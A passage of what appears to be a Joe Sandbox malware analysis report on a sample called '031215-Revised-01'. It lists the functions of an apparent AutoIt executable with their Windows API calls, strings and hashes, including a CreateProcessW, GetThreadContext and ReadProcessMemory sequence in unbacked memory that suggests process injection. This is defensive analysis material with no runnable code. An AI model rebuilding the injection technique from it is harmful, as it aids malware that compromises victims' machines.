                                        • Instruction Fuzzy Hash: 0F112AB5910208FFEB608FA5DC44AEEB7BCEF44744B10855ABA09D7110D375AE40ABA4
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01391A5B
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01391AF1
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01391B13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                        • Instruction ID: 6171276ad361e44c508e9daf08fb4addd48a57c4acc93df5ad35614d91273bb3
                                        • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                        • Instruction Fuzzy Hash: B3622C30A14259DBEB24DFA4C840BDEB376EF58304F1091A9D20DEB394E7799E81CB59
                                        Strings
                                        • Variable must be of type 'Object'., xrefs: 000C32B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable must be of type 'Object'.
                                        • API String ID: 0-109567571
                                        • Opcode ID: b37854082bed22e5bdefc0fa44ba60077f7f19cc9f0954ec244c942ffecf9095
                                        • Instruction ID: 08f0d097d5d1a5efbb6eb3f49f86ca03ca168833af6e55228b5f18280756a397
                                        • Opcode Fuzzy Hash: b37854082bed22e5bdefc0fa44ba60077f7f19cc9f0954ec244c942ffecf9095
                                        • Instruction Fuzzy Hash: F8C28D71E01245CFCB24DF58C884AADB7F1BF09300F24C5A9E959AB3A2D739AD81CB55
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000B33A2
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00073A04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_wcslen
                                        • String ID: Line:
                                        • API String ID: 2289894680-1585850449
                                        • Opcode ID: 1241ca3ec1a865cf369bb6be509f2231c796530ec01203960fb16edbc3611f88
                                        • Instruction ID: 36401ee33e374725153d3e9e1367160b7d06d48ccfa72f738eba939ee782788d
                                        • Opcode Fuzzy Hash: 1241ca3ec1a865cf369bb6be509f2231c796530ec01203960fb16edbc3611f88
                                        • Instruction Fuzzy Hash: F431C771808304AAD721EB20DC45BDF77D8AB41710F10892EF59D925A2DB749788C7D6
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00090668
                                          • Part of subcall function 000932A4: RaiseException.KERNEL32(?,?,?,0009068A,?,00141444,?,?,?,?,?,?,0009068A,00071129,00138738,00071129), ref: 00093304
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00090685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: e8355043839139e28ba15fb9c548b139716cff5895055f4fb0a511537fb537b2
                                        • Instruction ID: fe46c5472628a86c09d63d65a2135137f6645b3923461a83e372b84ec30eb247
                                        • Opcode Fuzzy Hash: e8355043839139e28ba15fb9c548b139716cff5895055f4fb0a511537fb537b2
                                        • Instruction Fuzzy Hash: E8F04F34900309ABCF10B6B4D846CAE77AD6F40350B604535B964D65D2EF71EA66EA81
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 000E302F
                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000E3044
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: 095fdccae70b25111f89c046b8b5cb449bf0bc405543ba463de04dd16e762978
                                        • Instruction ID: 0f26e5b8848a534bedb2987ee3023954cf12897580a34bb847ad563acf980ea4
                                        • Opcode Fuzzy Hash: 095fdccae70b25111f89c046b8b5cb449bf0bc405543ba463de04dd16e762978
                                        • Instruction Fuzzy Hash: 94D05E7250032877DA20A7A4AC0EFCB7E7CDB05750F0002A1B695E24D1DEF09984CED0
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 000F82F5
                                        • TerminateProcess.KERNEL32(00000000), ref: 000F82FC
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 000F84DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFreeLibraryTerminate
                                        • String ID:
                                        • API String ID: 146820519-0
                                        • Opcode ID: 0be3f4b5a4c56f5b7d07169621bd0f6970ca4cb849a27913cb87e107ee2d05b9
                                        • Instruction ID: d7bf1ec15d7d387c5d3d2aa51bca4cf6e7c9d516fc49566c77f0ba1d934fa125
                                        • Opcode Fuzzy Hash: 0be3f4b5a4c56f5b7d07169621bd0f6970ca4cb849a27913cb87e107ee2d05b9
                                        • Instruction Fuzzy Hash: C7127B71A083459FC764DF28C484BAABBE1BF89314F04C95DE9898B352CB35E945CF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72f86a4d20b91e3261ab881a35b37cc0bb66f6f78840d5265bbe5851453c1c1c
                                        • Instruction ID: 169f5df1d06ec658aab3ca8ddc75c41998d78fba2f371b7109c7ff5b00fde291
                                        • Opcode Fuzzy Hash: 72f86a4d20b91e3261ab881a35b37cc0bb66f6f78840d5265bbe5851453c1c1c
                                        • Instruction Fuzzy Hash: E551AD75E1060AAFCF219FE8CC45FEEBBB8BF06322F140059F505A7292D7359A419B61
                                        APIs
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00071BF4
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00071BFC
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00071C07
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00071C12
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00071C1A
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00071C22
                                          • Part of subcall function 00071B4A: RegisterWindowMessageW.USER32(00000004,?,000712C4), ref: 00071BA2
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0007136A
                                        • OleInitialize.OLE32 ref: 00071388
                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 000B24AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                        • String ID:
                                        • API String ID: 1986988660-0
                                        • Opcode ID: 122079b625598729e70da11bb66483d49fe490c18c82060f3a43c7d7d92ff077
                                        • Instruction ID: 8db2e4a1cd846870cfb1a3690534d00b503fbafdfc83b0f801c642d16ed5dbac
                                        • Opcode Fuzzy Hash: 122079b625598729e70da11bb66483d49fe490c18c82060f3a43c7d7d92ff077
                                        • Instruction Fuzzy Hash: 7171B9BCE11301AEC384EF79E9456D53AE1BB8B344358822AD55EDBAB2EB7444C1CF44
                                        APIs
                                          • Part of subcall function 00073923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00073A04
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000DC259
                                        • KillTimer.USER32(?,00000001,?,?), ref: 000DC261
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000DC270
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer$Kill
                                        • String ID:
                                        • API String ID: 3500052701-0
                                        • Opcode ID: 5eb822c056f097d22e01330ae6725886c005c8bf0c5fc459769f23da50660476
                                        • Instruction ID: e01aa07c33d5bc05b98627d784f8687e7cdc4e3063b2a45fed71717466639547
                                        • Opcode Fuzzy Hash: 5eb822c056f097d22e01330ae6725886c005c8bf0c5fc459769f23da50660476
                                        • Instruction Fuzzy Hash: C6318170904354AFFB729F648895BEBBBECAB06304F04449EE6DA97241C7745A84CB61
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,000A85CC,?,00138CC8,0000000C), ref: 000A8704
                                        • GetLastError.KERNEL32(?,000A85CC,?,00138CC8,0000000C), ref: 000A870E
                                        • __dosmaperr.LIBCMT ref: 000A8739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                        • String ID:
                                        • API String ID: 490808831-0
                                        • Opcode ID: 5055e2aee700747f232b089c45f2df27f43e7ae45677aef52a5847c2af9a1a93
                                        • Instruction ID: 85253269df09cd9b759a3e2b5cc7ed6080c293e6f035103aee64e280a87f0d8e
                                        • Opcode Fuzzy Hash: 5055e2aee700747f232b089c45f2df27f43e7ae45677aef52a5847c2af9a1a93
                                        • Instruction Fuzzy Hash: 14012B3360562026EAA563F46C45BBE67895BC3775F398219F9149B1D3DEB0CC858390
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 0007DB7B
                                        • DispatchMessageW.USER32(?), ref: 0007DB89
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0007DB9F
                                        • Sleep.KERNEL32(0000000A), ref: 0007DBB1
                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 000C1CC9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                        • String ID:
                                        • API String ID: 3288985973-0
                                        • Opcode ID: 6c562d1b3ccbd9490971d78321ed8a58ccb5e8b0c8f115f5aa420ae6be879bd6
                                        • Instruction ID: 1f3b3b66a020b1b3160f6bb4e71d7048c6425056b8c829c0bfd064c19e4b30f9
                                        • Opcode Fuzzy Hash: 6c562d1b3ccbd9490971d78321ed8a58ccb5e8b0c8f115f5aa420ae6be879bd6
                                        • Instruction Fuzzy Hash: 6BF03A306443859AE770CB608C89FEA73B8AF45310F504619F65A934D0DB74A4889B55
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,000E2CD4,?,?,?,00000004,00000001), ref: 000E2FF2
                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000E2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000E3006
                                        • CloseHandle.KERNEL32(00000000,?,000E2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000E300D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: e75614f4a1e78dc5f14a919de41dfb93c5e63443f34671371d42e6be299df8fd
                                        • Instruction ID: 4884936c2f1d73c36cbc9d5deab990d31abe7fde9836094a824c7dece919bb55
                                        • Opcode Fuzzy Hash: e75614f4a1e78dc5f14a919de41dfb93c5e63443f34671371d42e6be299df8fd
                                        • Instruction Fuzzy Hash: 99E0863228121477D2302755BC0DF8B3E5CD78AB71F104310F7597A0D046F0154146E8
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 000817F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: CALL
                                        • API String ID: 1385522511-4196123274
                                        • Opcode ID: 99d831d7fa558b3d3f2c99932d1432429509bd4b00b581b55981516bf77032ea
                                        • Instruction ID: 00036127cc544271f457456757f2adc0eba64971749c2c4d740a403f51c60014
                                        • Opcode Fuzzy Hash: 99d831d7fa558b3d3f2c99932d1432429509bd4b00b581b55981516bf77032ea
                                        • Instruction Fuzzy Hash: 03226B70608241DFC724EF14C484BAABBF5BF85314F14896DF49A8B3A2D772E946CB52
                                        APIs
                                        • _wcslen.LIBCMT ref: 000E6F6B
                                          • Part of subcall function 00074ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074EFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad_wcslen
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 3312870042-2806939583
                                        • Opcode ID: 97e9e158ae8930e5ff8994f6c5dd34427b547b6d8852cd02e27e29c497bbe4e9
                                        • Instruction ID: f30e8b491fcb11c573c0d7a49dee08e241682d97b4fd83a49692c0e493c33f6d
                                        • Opcode Fuzzy Hash: 97e9e158ae8930e5ff8994f6c5dd34427b547b6d8852cd02e27e29c497bbe4e9
                                        • Instruction Fuzzy Hash: 23B1B2306082418FCB54EF20C4919AEB7E5AF94300F44886DF49E972A3EF34ED49CB96
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 000B2C8C
                                          • Part of subcall function 00073AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00073A97,?,?,00072E7F,?,?,?,00000000), ref: 00073AC2
                                          • Part of subcall function 00072DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00072DC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Name$Path$FileFullLongOpen
                                        • String ID: X
                                        • API String ID: 779396738-3081909835
                                        • Opcode ID: 57c565a7e10255cba23c6c5b44339fb4579f2658cdb1f12dea80bba0fe111977
                                        • Instruction ID: dd3f4595f1edcff148b32ee540af6bf14abe2dbe7647023bbc564d067292fdf0
                                        • Opcode Fuzzy Hash: 57c565a7e10255cba23c6c5b44339fb4579f2658cdb1f12dea80bba0fe111977
                                        • Instruction Fuzzy Hash: 80217271E00258AFDB51EF94C845BEE7BF8AF49314F00C059E449B7242DBB85A89CFA5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID: EA06
                                        • API String ID: 2638373210-3962188686
                                        • Opcode ID: be470cd129fff612b1dc4b2ad5f6b8aeae5a1a48ee83f12100ad8f54ec25987b
                                        • Instruction ID: 666740f03d8e1604966ba405481c7f7108b6ccb3c0be5b175f5775d3280cef9a
                                        • Opcode Fuzzy Hash: be470cd129fff612b1dc4b2ad5f6b8aeae5a1a48ee83f12100ad8f54ec25987b
                                        • Instruction Fuzzy Hash: CC01B5729042587EDF28C7A8C856EEEBBFC9B05301F00455AE192E2182E5B4EA089B60
                                        APIs
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00073908
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_
                                        • String ID:
                                        • API String ID: 1144537725-0
                                        • Opcode ID: c8e439cbdd07f7b85741d00d0a726d39e4ccddb00ec4a793041c485faa0b5bf2
                                        • Instruction ID: 02b727eb2b95627d961c93783d0cd1eb29eef01dbedad6bd4f26d623f90bf069
                                        • Opcode Fuzzy Hash: c8e439cbdd07f7b85741d00d0a726d39e4ccddb00ec4a793041c485faa0b5bf2
                                        • Instruction Fuzzy Hash: DF319370904301AFE760DF24D8847D7BBE4FB49718F00092EF59D83651E775AA84DB56
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0007BB4E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID:
                                        • API String ID: 1385522511-0
                                        • Opcode ID: 9fc351bdf04dc3d087bb28b60dbb788f0634db14876fb6576403d67ad87e6b80
                                        • Instruction ID: 2e5a4d03afaea87d1a107801654364875dfdace254eaed8aab010408b1f4872d
                                        • Opcode Fuzzy Hash: 9fc351bdf04dc3d087bb28b60dbb788f0634db14876fb6576403d67ad87e6b80
                                        • Instruction Fuzzy Hash: 78327934E00209EFDB24DF54C894FBEB7F9EB45304F148059E919AB262D778AE81CB95
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01391A5B
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01391AF1
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01391B13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                        • Instruction ID: ae4fe05832afc718b7e3b241fc9b5f9ea6ada48ef9eb537aed5f27827ca6ebeb
                                        • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                        • Instruction Fuzzy Hash: 7C12BF24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                        APIs
